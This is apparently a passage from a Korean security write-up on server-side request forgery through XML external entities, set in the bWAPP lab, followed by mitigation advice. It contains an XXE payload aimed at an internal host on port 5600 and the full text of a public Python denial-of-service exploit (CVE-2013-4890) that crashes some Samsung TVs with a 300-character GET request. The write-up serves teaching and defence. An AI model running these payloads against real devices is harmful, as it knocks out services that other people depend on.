 <!ENTITY bWAPP SYSTEM "http://[IP]:5600/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA">
]>
<reset><login>&bWAPP;</login><secret>blah</secret></reset>

- 공개된 PoC를 확인해보면, 취약한 삼성 스마트 TV에 A를 300개로 설정 및 TCP/5600로 요청을 전송하는 것을 확인할 수 있음

#!/usr/bin/python

# Exploit Title: Samsung TV Denial of Service (DoS) Attack
# Date: 07/21/2013
# Exploit Author: Malik Mesellem - @MME_IT - http://www.itsecgames.com
# CVE Number: CVE-2013-4890
# Vendor Homepage: http://www.samsung.com
# Description: Resets some Samsung TVs
#   The web server (DMCRUIS/0.1) on port TCP/5600 is crashing by sending a long HTTP GET request
#   Tested successfully on my Samsung PS50C7700 plasma TV :)
 
import httplib
import sys
import os

print "  ***************************************************************************************"
print "   Author: Malik Mesellem - @MME_IT - http://www.itsecgames.com\n"
print "   Exploit: Denial of Service (DoS) attack\n"
print "   Description: Resets some Samsung TVs\n"
print "     The web server (DMCRUIS/0.1) on port TCP/5600 is crashing by sending a long request."
print "     Tested successfully on my Samsung PS50C7700 plasma TV :)\n"
print "  ***************************************************************************************\n"

# Sends the payload
print "  Sending the malicious payload...\n"
conn = httplib.HTTPConnection(sys.argv[1],5600)
conn.request("GET", "A"*300)
conn.close()

# Checks the response
print "  Checking the status... (CTRL+Z to stop)\n"
response = 0
while response == 0:
  response = os.system("ping -c 1 " + sys.argv[1] + "> /dev/null 2>&1")
  if response != 0:
    print "  Target down!\n"

- 공격 시연 YouTebe

https://www.youtube.com/watch?v=U-R2epNnUiM

3. 대응방안

① 입력값 필터링

- 서버 내부에서 접근해선 안 되는 값들을 필터링하거나 127.0.0.1, localhost, 사설 IP 대역 등을 블랙리스트필터링
- 허용된 도메인과 URL에 대해서만 접근 가능하도록 입력값을 화이트리스트 방식으로 필터링

- 우회 가능한 값들도 같이 필터링

② 중요한 정보가 포함된 경우 추가 인증을 적용

③ 중요한 정보가 포함된 서버 등을 분리